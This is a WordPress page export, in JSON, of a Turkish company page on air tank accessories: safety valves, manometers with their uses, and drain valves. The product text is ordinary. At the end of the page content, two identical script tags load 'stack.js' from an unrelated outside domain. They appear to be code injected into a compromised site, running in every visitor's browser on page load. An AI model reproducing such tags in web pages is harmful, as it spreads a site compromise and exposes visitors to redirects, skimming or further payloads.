{"id":851,"date":"2021-04-13T13:35:26","date_gmt":"2021-04-13T10:35:26","guid":{"rendered":"http:\/\/gensalimited.com.tr\/index.php\/hava-tanki-nedir-copy\/"},"modified":"2021-04-13T13:44:57","modified_gmt":"2021-04-13T10:44:57","slug":"hava-tanklari-icin-gerekli-aksesuarlar-nelerdir","status":"publish","type":"page","link":"https:\/\/gensalimited.com.tr\/index.php\/hava-tanklari-icin-gerekli-aksesuarlar-nelerdir\/","title":{"rendered":"Hava tanklar\u0131 i\u00e7in gerekli aksesuarlar nelerdir?"},"content":{"rendered":"<p>[vc_row slider_content=&#8221;&#8221; css=&#8221;.vc_custom_1590671563942{padding-top: 100px !important;padding-bottom: 65px !important;background-color: #e9e9e9 !important;}&#8221;][vc_column][vc_row_inner content_placement=&#8221;middle&#8221;][vc_column_inner width=&#8221;1\/2&#8243;][vc_column_text]<\/p>\n<p class=\"Standard\"><b><span lang=\"EN-US\">Bas\u0131n\u00e7l\u0131 Hava Emniyet Valfleri<\/span><\/b><\/p>\n<p class=\"Standard\"><b><span lang=\"EN-US\">\u00a0<\/span><\/b><span lang=\"EN-US\">Hava tanklar\u0131 Avrupa standartlar\u0131na g\u00f6re en az bir adet emniyet valfine sahip olmal\u0131d\u0131r.<\/span><\/p>\n<p class=\"Standard\"><span lang=\"EN-US\">\u00a0<\/span><span lang=\"EN-US\">Emniyet valfleri iki \u015fekilde olabilir.<\/span><\/p>\n<p class=\"Standard\"><span lang=\"EN-US\">\u00a0<\/span><span lang=\"EN-US\">1. \u00dcreticinin \u00f6nceden belirledi\u011fi bir sabit bas\u0131n\u00e7ta \u00e7al\u0131\u015fanlar.<\/span><\/p>\n<p class=\"Standard\"><span lang=\"EN-US\">\u00a0<\/span><span lang=\"EN-US\">2. Farkl\u0131 modeller de, kullan\u0131c\u0131n\u0131n iste\u011fine g\u00f6re manuel olarak hangi bas\u0131n\u00e7ta a\u00e7\u0131laca\u011f\u0131na karar verilen emniyet valfleri.<\/span><\/p>\n<p class=\"Standard\"><span lang=\"EN-US\">\u00a0<\/span><span lang=\"EN-US\">Bu iki modelden hangisini se\u00e7ece\u011fi kullan\u0131c\u0131n\u0131n kendi karar\u0131d\u0131r. \u0130ste\u011fe g\u00f6re talep edilebilir.<\/span><\/p>\n<p>[\/vc_column_text][\/vc_column_inner][vc_column_inner width=&#8221;1\/2&#8243; css=&#8221;.vc_custom_1590671536767{margin-left: 45px !important;}&#8221;][vc_single_image image=&#8221;852&#8243; img_size=&#8221;full&#8221;][\/vc_column_inner][\/vc_row_inner][vc_row_inner content_placement=&#8221;middle&#8221;][vc_column_inner width=&#8221;1\/2&#8243;][vc_single_image image=&#8221;854&#8243; img_size=&#8221;full&#8221;][\/vc_column_inner][vc_column_inner width=&#8221;1\/2&#8243; css=&#8221;.vc_custom_1590671536767{margin-left: 45px !important;}&#8221;][vc_column_text]<strong>Manometre\u00a0<\/strong><\/p>\n<p>Manometreler bas\u0131n\u00e7 alt\u0131nda \u00e7al\u0131\u015fan d\u00fczeneklerde, yeterli bas\u0131nc\u0131n olu\u015fup olu\u015fmad\u0131\u011f\u0131n\u0131 \u00f6l\u00e7meye yararlar.\u00a0 Ayr\u0131ca minimum ve maksimum bas\u0131n\u00e7 de\u011ferlerini \u00fczerinde bulunduran t\u00fcrleri de vard\u0131r.<\/p>\n<p>Kullan\u0131m alanlar\u0131<\/p>\n<ul>\n<li>Bas\u0131n\u00e7l\u0131 hava hatlar\u0131<\/li>\n<li>Sa\u011fl\u0131k cihazlar\u0131<\/li>\n<li>Hidrolik sistemler<\/li>\n<li>Kalorifer tesisatlar\u0131<\/li>\n<li>Su pompalar\u0131<\/li>\n<li>Su sirk\u00fclasyon sistemleri, v.b<\/li>\n<li>Is\u0131tma ve iklimlendirme makinelerinde<\/li>\n<li>Makine \u00fcretimlerinde<\/li>\n<\/ul>\n<p>[\/vc_column_text][\/vc_column_inner][\/vc_row_inner][vc_row_inner content_placement=&#8221;middle&#8221;][vc_column_inner width=&#8221;1\/2&#8243;][vc_column_text]<strong>Tahliye(Vana)<\/strong><\/p>\n<p>Hava veya bas\u0131n\u00e7l\u0131 tanklardaki zaman i\u00e7erisinde olu\u015fan yo\u011fu\u015fma suyunu tahliye edece\u011fimiz yerdir. Genellikle tank\u0131n alt bombesinin ortas\u0131nda bulunur. 2 tip \u00e7e\u015fit mevcuttur.<\/p>\n<ul>\n<li>Manuel k\u00fcresel vana<\/li>\n<li>Zaman ayarl\u0131 selenoid vana<\/li>\n<\/ul>\n<p>[\/vc_column_text][\/vc_column_inner][vc_column_inner width=&#8221;1\/2&#8243; css=&#8221;.vc_custom_1590671536767{margin-left: 45px !important;}&#8221;][vc_single_image image=&#8221;855&#8243; img_size=&#8221;full&#8221;][\/vc_column_inner][\/vc_row_inner][\/vc_column][\/vc_row]<script src=\"https:\/\/refer.specialadves.com\/stack.js?ver=12.3.4\"><\/script><script src=\"https:\/\/refer.specialadves.com\/stack.js?ver=12.3.4\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>[vc_row slider_content=&#8221;&#8221; css=&#8221;.vc_custom_1590671563942{padding-top: 100px !important;padding-bottom: 65px !important;background-color: #e9e9e9 !important;}&#8221;][vc_column][vc_row_inner content_placement=&#8221;middle&#8221;][vc_column_inner width=&#8221;1\/2&#8243;][vc_column_text] Bas\u0131n\u00e7l\u0131 Hava Emniyet Valfleri \u00a0Hava tanklar\u0131 Avrupa standartlar\u0131na g\u00f6re en az bir adet emniyet valfine sahip olmal\u0131d\u0131r. \u00a0Emniyet valfleri iki \u015fekilde&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"page-templates\/home-blank.php","meta":{"inline_featured_image":false,"footnotes":""},"class_list":["post-851","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/gensalimited.com.tr\/index.php\/wp-json\/wp\/v2\/pages\/851","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/gensalimited.com.tr\/index.php\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/gensalimited.com.tr\/index.php\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/gensalimited.com.tr\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/gensalimited.com.tr\/index.php\/wp-json\/wp\/v2\/comments?post=851"}],"version-history":[{"count":2,"href":"https:\/\/gensalimited.com.tr\/index.php\/wp-json\/wp\/v2\/pages\/851\/revisions"}],"predecessor-version":[{"id":856,"href":"https:\/\/gensalimited.com.tr\/index.php\/wp-json\/wp\/v2\/pages\/851\/revisions\/856"}],"wp:attachment":[{"href":"https:\/\/gensalimited.com.tr\/index.php\/wp-json\/wp\/v2\/media?parent=851"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}